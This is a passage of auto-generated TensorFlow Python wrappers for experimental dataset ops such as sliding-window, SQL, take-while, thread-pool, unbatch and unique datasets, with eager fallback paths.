output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sliding_window_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalSlidingWindowDataset", input_dataset=input_dataset,
window_size=window_size,
window_shift=window_shift,
window_stride=window_stride,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalSlidingWindowDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalSlidingWindowDataset(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None):
return experimental_sliding_window_dataset(input_dataset=input_dataset, window_size=window_size, window_shift=window_shift, window_stride=window_stride, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalSlidingWindowDataset.__doc__ = experimental_sliding_window_dataset.__doc__
ExperimentalSlidingWindowDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSlidingWindowDataset))
tf_export("raw_ops.ExperimentalSlidingWindowDataset")(ExperimentalSlidingWindowDataset)
def experimental_sliding_window_dataset_eager_fallback(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_sliding_window_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sliding_window_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sliding_window_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
window_size = _ops.convert_to_tensor(window_size, _dtypes.int64)
window_shift = _ops.convert_to_tensor(window_shift, _dtypes.int64)
window_stride = _ops.convert_to_tensor(window_stride, _dtypes.int64)
_inputs_flat = [input_dataset, window_size, window_shift, window_stride]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalSlidingWindowDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalSlidingWindowDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_sql_dataset(driver_name, data_source_name, query, output_types, output_shapes, name=None):
r"""Creates a dataset that executes a SQL query and emits rows of the result set.
Args:
driver_name: A `Tensor` of type `string`.
The database type. Currently, the only supported type is 'sqlite'.
data_source_name: A `Tensor` of type `string`.
A connection string to connect to the database.
query: A `Tensor` of type `string`. A SQL query to execute.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalSqlDataset", name, _ctx._post_execution_callbacks,
driver_name, data_source_name, query, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_sql_dataset_eager_fallback(
driver_name, data_source_name, query, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sql_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sql_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalSqlDataset", driver_name=driver_name,
data_source_name=data_source_name,
query=query, output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalSqlDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalSqlDataset(driver_name, data_source_name, query, output_types, output_shapes, name=None):
return experimental_sql_dataset(driver_name=driver_name, data_source_name=data_source_name, query=query, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalSqlDataset.__doc__ = experimental_sql_dataset.__doc__
ExperimentalSqlDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSqlDataset))
tf_export("raw_ops.ExperimentalSqlDataset")(ExperimentalSqlDataset)
def experimental_sql_dataset_eager_fallback(driver_name, data_source_name, query, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_sql_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_sql_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_sql_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
driver_name = _ops.convert_to_tensor(driver_name, _dtypes.string)
data_source_name = _ops.convert_to_tensor(data_source_name, _dtypes.string)
query = _ops.convert_to_tensor(query, _dtypes.string)
_inputs_flat = [driver_name, data_source_name, query]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalSqlDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalSqlDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_stats_aggregator_handle(container="", shared_name="", name=None):
r"""Creates a statistics manager resource.
Args:
container: An optional `string`. Defaults to `""`.
shared_name: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalStatsAggregatorHandle", name,
_ctx._post_execution_callbacks, "container", container, "shared_name",
shared_name)
return _result
except _core._FallbackException:
try:
return experimental_stats_aggregator_handle_eager_fallback(
container=container, shared_name=shared_name, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalStatsAggregatorHandle", container=container,
shared_name=shared_name,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("container", _op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"))
_execute.record_gradient(
"ExperimentalStatsAggregatorHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalStatsAggregatorHandle(container="", shared_name="", name=None):
return experimental_stats_aggregator_handle(container=container, shared_name=shared_name, name=name)
ExperimentalStatsAggregatorHandle.__doc__ = experimental_stats_aggregator_handle.__doc__
ExperimentalStatsAggregatorHandle = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalStatsAggregatorHandle))
tf_export("raw_ops.ExperimentalStatsAggregatorHandle")(ExperimentalStatsAggregatorHandle)
def experimental_stats_aggregator_handle_eager_fallback(container="", shared_name="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_stats_aggregator_handle
"""
_ctx = ctx if ctx else _context.context()
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_inputs_flat = []
_attrs = ("container", container, "shared_name", shared_name)
_result = _execute.execute(b"ExperimentalStatsAggregatorHandle", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalStatsAggregatorHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_stats_aggregator_summary(iterator, name=None):
r"""Produces a summary of any statistics recorded by the given statistics manager.
Args:
iterator: A `Tensor` of type `resource`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `string`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalStatsAggregatorSummary", name,
_ctx._post_execution_callbacks, iterator)
return _result
except _core._FallbackException:
try:
return experimental_stats_aggregator_summary_eager_fallback(
iterator, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalStatsAggregatorSummary", iterator=iterator, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"ExperimentalStatsAggregatorSummary", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalStatsAggregatorSummary(iterator, name=None):
return experimental_stats_aggregator_summary(iterator=iterator, name=name)
ExperimentalStatsAggregatorSummary.__doc__ = experimental_stats_aggregator_summary.__doc__
ExperimentalStatsAggregatorSummary = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalStatsAggregatorSummary))
tf_export("raw_ops.ExperimentalStatsAggregatorSummary")(ExperimentalStatsAggregatorSummary)
def experimental_stats_aggregator_summary_eager_fallback(iterator, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_stats_aggregator_summary
"""
_ctx = ctx if ctx else _context.context()
iterator = _ops.convert_to_tensor(iterator, _dtypes.resource)
_inputs_flat = [iterator]
_attrs = None
_result = _execute.execute(b"ExperimentalStatsAggregatorSummary", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalStatsAggregatorSummary", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_take_while_dataset(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None):
r"""Creates a dataset that stops iteration when predicate` is false.
The `predicate` function must return a scalar boolean and accept the
following arguments:
* One tensor for each component of an element of `input_dataset`.
* One tensor for each value in `other_arguments`.
Args:
input_dataset: A `Tensor` of type `variant`.
other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when
building a closure for `predicate`.
predicate: A function decorated with @Defun.
A function returning a scalar boolean.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalTakeWhileDataset", name, _ctx._post_execution_callbacks,
input_dataset, other_arguments, "predicate", predicate,
"output_types", output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_take_while_dataset_eager_fallback(
input_dataset, other_arguments, predicate=predicate,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_take_while_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_take_while_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalTakeWhileDataset", input_dataset=input_dataset,
other_arguments=other_arguments,
predicate=predicate,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("predicate", _op.get_attr("predicate"), "Targuments",
_op.get_attr("Targuments"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalTakeWhileDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalTakeWhileDataset(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None):
return experimental_take_while_dataset(input_dataset=input_dataset, other_arguments=other_arguments, predicate=predicate, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalTakeWhileDataset.__doc__ = experimental_take_while_dataset.__doc__
ExperimentalTakeWhileDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalTakeWhileDataset))
tf_export("raw_ops.ExperimentalTakeWhileDataset")(ExperimentalTakeWhileDataset)
def experimental_take_while_dataset_eager_fallback(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_take_while_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_take_while_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_take_while_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset] + list(other_arguments)
_attrs = ("predicate", predicate, "Targuments", _attr_Targuments,
"output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalTakeWhileDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalTakeWhileDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_thread_pool_dataset(input_dataset, thread_pool, output_types, output_shapes, name=None):
r"""Creates a dataset that uses a custom thread pool to compute `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
thread_pool: A `Tensor` of type `resource`.
A resource produced by the ThreadPoolHandle op.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalThreadPoolDataset", name, _ctx._post_execution_callbacks,
input_dataset, thread_pool, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_thread_pool_dataset_eager_fallback(
input_dataset, thread_pool, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_thread_pool_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_thread_pool_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalThreadPoolDataset", input_dataset=input_dataset,
thread_pool=thread_pool,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalThreadPoolDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalThreadPoolDataset(input_dataset, thread_pool, output_types, output_shapes, name=None):
return experimental_thread_pool_dataset(input_dataset=input_dataset, thread_pool=thread_pool, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalThreadPoolDataset.__doc__ = experimental_thread_pool_dataset.__doc__
ExperimentalThreadPoolDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalThreadPoolDataset))
tf_export("raw_ops.ExperimentalThreadPoolDataset")(ExperimentalThreadPoolDataset)
def experimental_thread_pool_dataset_eager_fallback(input_dataset, thread_pool, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_thread_pool_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_thread_pool_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_thread_pool_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
thread_pool = _ops.convert_to_tensor(thread_pool, _dtypes.resource)
_inputs_flat = [input_dataset, thread_pool]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalThreadPoolDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalThreadPoolDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_thread_pool_handle(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None):
r"""Creates a dataset that uses a custom thread pool to compute `input_dataset`.
Args:
num_threads: An `int`. The number of threads in the thread pool.
display_name: A `string`.
A human-readable name for the threads that may be visible in some
visualizations.
threadpool.
max_intra_op_parallelism: An optional `int`. Defaults to `1`.
The maximum degree of parallelism to use within operations that execute on this
threadpool.
container: An optional `string`. Defaults to `""`.
shared_name: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalThreadPoolHandle", name, _ctx._post_execution_callbacks,
"num_threads", num_threads, "max_intra_op_parallelism",
max_intra_op_parallelism, "display_name", display_name, "container",
container, "shared_name", shared_name)
return _result
except _core._FallbackException:
try:
return experimental_thread_pool_handle_eager_fallback(
num_threads=num_threads,
max_intra_op_parallelism=max_intra_op_parallelism,
display_name=display_name, container=container,
shared_name=shared_name, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
num_threads = _execute.make_int(num_threads, "num_threads")
display_name = _execute.make_str(display_name, "display_name")
if max_intra_op_parallelism is None:
max_intra_op_parallelism = 1
max_intra_op_parallelism = _execute.make_int(max_intra_op_parallelism, "max_intra_op_parallelism")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalThreadPoolHandle", num_threads=num_threads,
display_name=display_name,
max_intra_op_parallelism=max_intra_op_parallelism,
container=container,
shared_name=shared_name, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("num_threads", _op.get_attr("num_threads"),
"max_intra_op_parallelism",
_op.get_attr("max_intra_op_parallelism"), "display_name",
_op.get_attr("display_name"), "container",
_op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"))
_execute.record_gradient(
"ExperimentalThreadPoolHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalThreadPoolHandle(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None):
return experimental_thread_pool_handle(num_threads=num_threads, display_name=display_name, max_intra_op_parallelism=max_intra_op_parallelism, container=container, shared_name=shared_name, name=name)
ExperimentalThreadPoolHandle.__doc__ = experimental_thread_pool_handle.__doc__
ExperimentalThreadPoolHandle = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalThreadPoolHandle))
tf_export("raw_ops.ExperimentalThreadPoolHandle")(ExperimentalThreadPoolHandle)
def experimental_thread_pool_handle_eager_fallback(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_thread_pool_handle
"""
_ctx = ctx if ctx else _context.context()
num_threads = _execute.make_int(num_threads, "num_threads")
display_name = _execute.make_str(display_name, "display_name")
if max_intra_op_parallelism is None:
max_intra_op_parallelism = 1
max_intra_op_parallelism = _execute.make_int(max_intra_op_parallelism, "max_intra_op_parallelism")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_inputs_flat = []
_attrs = ("num_threads", num_threads, "max_intra_op_parallelism",
max_intra_op_parallelism, "display_name", display_name, "container",
container, "shared_name", shared_name)
_result = _execute.execute(b"ExperimentalThreadPoolHandle", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalThreadPoolHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_unbatch_dataset(input_dataset, output_types, output_shapes, name=None):
r"""A dataset that splits the elements of its input into multiple elements.
Args:
input_dataset: A `Tensor` of type `variant`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalUnbatchDataset", name, _ctx._post_execution_callbacks,
input_dataset, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_unbatch_dataset_eager_fallback(
input_dataset, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_unbatch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_unbatch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalUnbatchDataset", input_dataset=input_dataset,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalUnbatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalUnbatchDataset(input_dataset, output_types, output_shapes, name=None):
return experimental_unbatch_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalUnbatchDataset.__doc__ = experimental_unbatch_dataset.__doc__
ExperimentalUnbatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalUnbatchDataset))
tf_export("raw_ops.ExperimentalUnbatchDataset")(ExperimentalUnbatchDataset)
def experimental_unbatch_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_unbatch_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_unbatch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_unbatch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalUnbatchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalUnbatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_unique_dataset(input_dataset, output_types, output_shapes, name=None):
r"""Creates a dataset that contains the unique elements of `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalUniqueDataset", name, _ctx._post_execution_callbacks,
input_dataset, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_unique_dataset_eager_fallback(
input_dataset, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_unique_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_unique_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalUniqueDataset", input_dataset=input_dataset,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalUniqueDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalUniqueDataset(input_dataset, output_types, output_shapes, name=None):
return experimental_unique_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalUniqueDataset.__doc__ = experimental_unique_dataset.__doc__
ExperimentalUniqueDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalUniqueDataset))
tf_export("raw_ops.ExperimentalUniqueDataset")(ExperimentalUniqueDataset)
def experimental_unique_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_unique_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_unique_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_unique_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
